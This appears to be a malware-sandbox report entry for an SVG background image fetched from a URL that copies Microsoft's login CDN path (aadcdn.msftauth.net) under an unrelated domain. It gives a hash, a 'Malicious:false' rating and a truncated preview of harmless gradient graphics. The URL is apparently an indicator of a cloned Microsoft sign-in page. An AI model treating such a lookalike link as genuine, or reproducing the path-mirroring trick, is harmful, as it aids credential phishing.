                                              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                              Malicious:false
                                              Reputation:unknown
                                              URL:https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                              No static file info